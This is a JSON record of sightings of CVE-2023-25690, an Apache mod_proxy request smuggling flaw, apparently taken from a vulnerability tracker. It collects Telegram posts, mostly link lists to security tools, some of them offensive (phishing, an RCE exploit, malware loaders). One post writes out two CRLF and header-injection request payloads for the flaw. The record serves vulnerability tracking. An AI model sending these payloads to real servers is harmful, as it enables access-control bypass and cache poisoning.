for Maldev members. But we're also publishing an EXE version of the loader on our GitHub for anyone to use.\n\ngithub.com/Maldev-Academy\n\nContainers don't inherit timezones from host machines\n\nThe default timezone for most images is UTC, but it isn't guaranteed\n\nk8tz is a kubernetes admission controller and a CLI tool to inject timezones into Pods\n\ngithub.com/k8tz/k8tz\n\nAwesome free cloud native security learning labs. Includes CTF, self-hosted workshops, guided vulnerability labs, and research labs.\n\nhttps://github.com/iknowjason/Awesome-CloudSec-Labs\n\nSend phishing messages and attachments to Microsoft Teams users\n\nhttps://github.com/Octoberfest7/TeamsPhisher\n\nA collection of bookmarks for penetration testers, bug bounty hunters, malware developers, reverse engineers and anyone who is just interested in infosec topics.\n\nhttps://github.com/kargisimos/offensive-bookmarks\n\nNext blog in Windows Internals - Deep dive inside creation of process with C++ and NTAPIs\n\nhttps://github.com/Faran-17/Windows-Internals/blob/main/Processes%20and%20Jobs/Processes/Creation%20Of%20Process.md\n\nCVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability.\n\nhttps://github.com/dhmosfunk/CVE-2023-25690-POC\n\n#infosec #cybersecurity #hackersfactory\n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-09-14T05:11:44.000000Z"}, {"uuid": "22a4b0a7-eeb3-4031-a608-fe97048ca5ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3181", "content": "Hackers Factory \n\n[PoC] [CVE-2023-25690] Apache HTTP Server mod_proxy vul\n\nCLRF Injection\nGET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1\nHost: \n\nHeader Injection\nGET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1\nHost: 1.1.1.1\n\nhttps://github.com/dhmosfunk/CVE-2023-25690-POC\n\nCVE-2023-4634\n\nRCE Exploit for Wordpress Plugin Media-Library Plugin < 3.10 (CVE-2023-4634)\n\nhttps://github.com/Patrowl/CVE-2023-4634\n\nA cross-platform command-line interface (CLI) tool that allows you to use ChatGPT 3.5 in your Terminal without requiring API keys.\n\ngithub.com/aandrew-me/tgpt\n\nexamples of using radius2 to solve reversing challenges\n\nhttps://github.com/aemmitt-ns/radius2-examples\n\nRun Capture the Flags and Security Trainings with OWASP WrongSecrets\n\nhttps://github.com/OWASP/wrongsecrets-ctf-party\n\nAvred is being used to identify which parts of a file are identified by a Antivirus, and tries to show as much possible information and context about each match.\n\ngithub.com/dobin/avred\n\nWeb:\navred.r00ted.ch\n\nA Pin Tool for tracing API calls etc\n\nhttps://github.com/hasherezade/tiny_tracer\n\nAn open-source self-hosted purple team management web application.\n\nhttps://github.com/CyberCX-STA/PurpleOps\n\nEvolutionary encryption framework based on scalable complexity over time.\n\ngithub.com/jofpin/temcrypt\n\n#infosec #cybersecurity #hackersfactory \n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-09-07T07:54:50.000000Z"}, {"uuid": "4dd14a74-c88b-48e1-bfc6-97ab5a78f494", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "https://t.me/breachdetector/348337", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"CVE-2023-25690 Apache HTTP Server Security Vulnerability: What Is It?\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"29 Sep 2023\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2023-09-29T10:58:14.000000Z"}, {"uuid": "012f7cc8-3ddd-4d3e-9757-4819c314a0e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "https://t.me/breachdetector/348321", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"CVE-2023-25690 Apache HTTP Sunucusu G\u00fcvenlik A\u00e7\u0131\u011f\u0131 Nedir ?\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"29 Sep 2023\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2023-09-29T10:32:24.000000Z"}, {"uuid": "cfe597bd-de73-4913-be7c-80cb81410889", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/Securi3yTalent/130", "content": "Linux File System : \n\nhttps://medium.com/@nijithneo/exploring-the-linux-file-system-a-comprehensive-guide-d0f0748d0b69\n\nThe Secrets of Steganography :\n\nhttps://medium.com/@nijithneo/unlocking-the-secrets-of-steganography-a-digital-adventure-816a5dd8432a\n\nBasic Python :\n\nhttps://medium.com/@nijithneo/basic-python-a-comprehensive-study-guide-8cedcad5e390\n\nExploring Cross-Site Scripting (XSS) Vulnerabilities :\n\nhttps://medium.com/@nijithneo/exploring-cross-site-scripting-xss-vulnerabilities-payloads-techniques-and-mitigation-72f2efb6fce3\n\nCVE-2023\u201325690: Apache HTTP Server\u2019s HTTP Request Smuggling Vulnerability :\n\nhttps://medium.com/@nijithneo/understanding-cve-2023-25690-apache-http-servers-http-request-smuggling-vulnerability-d7dde44b8d0c\n\nCross-Site Request Forgery (CSRF) Attacks :\n\nhttps://medium.com/@nijithneo/cross-site-request-forgery-csrf-attacks-understanding-prevention-and-security-measures-f16a9bfaa6f0\n\nEvil Twin: A Closer Look at Wi-Fi Security Threats :\n\nhttps://medium.com/@nijithneo/evil-twin-a-closer-look-at-wi-fi-security-threats-bb112cf6e688", "creation_timestamp": "2023-10-01T05:14:07.000000Z"}, {"uuid": "b40ee2f3-cf0f-4b75-b7e2-1c8d02d2f1f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/762", "content": "CVE-2023-25690 : Apache HTTP Server 2.4.0 > 2.4.55 / 56 - HTTP Request Smuggling\nhttps://xz.aliyun.com/t/12345", "creation_timestamp": "2023-07-26T22:29:01.000000Z"}, {"uuid": "ec5e8a89-993d-47e9-8e38-1fc9ca3c8e67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/794", "content": "CVE-2023-25690 : Apache HTTP Server 2.4.0 > 2.4.55 / 56 - HTTP Request Smuggling\nPost/More : https://t.me/MrVGunz/762\nLab/PoC : https://github.com/dhmosfunk/CVE-2023-25690-POC", "creation_timestamp": "2023-08-06T14:31:02.000000Z"}, {"uuid": "be2ee65e-f578-4a86-a8ff-65049a50482d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "https://t.me/cibsecurity/59572", "content": "\u203c CVE-2023-25690 \u203c\n\nSome mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack. Configurations are affected when mod_proxy is enabled along with some form of RewriteRule or ProxyPassMatch in which a non-specific pattern matches some portion of the user-supplied request-target (URL) data and is then re-inserted into the proxied request-target using variable substitution. For example, something like: RewriteEngine on RewriteRule \"^/here/(.*)\" \"http://example.com:8080/elsewhere?$1\"; [P] ProxyPassReverse /here/ http://example.com:8080/ Request splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-03-07T18:13:39.000000Z"}, {"uuid": "9c48e36a-9346-4ee4-a4e5-9276173281f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8347", "content": "#exploit\n1. CVE-2023-25690:\nMod_proxy vulnerable configuration on Apache HTTP Server 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability\nhttps://github.com/dhmosfunk/CVE-2023-25690-POC\n\n2. CVE-2023-2822:\nReflected Cross-Site Scripting Vulnerability in Ellucian Ethos Identity CAS Logout Page\nhttps://github.com/cberman/CVE-2023-2822-demo\n]-> https://medium.com/@cyberninja717/reflected-cross-site-scripting-vulnerability-in-ellucian-ethos-identity-cas-logout-page-685bb1675dfb", "creation_timestamp": "2023-05-23T11:01:08.000000Z"}]}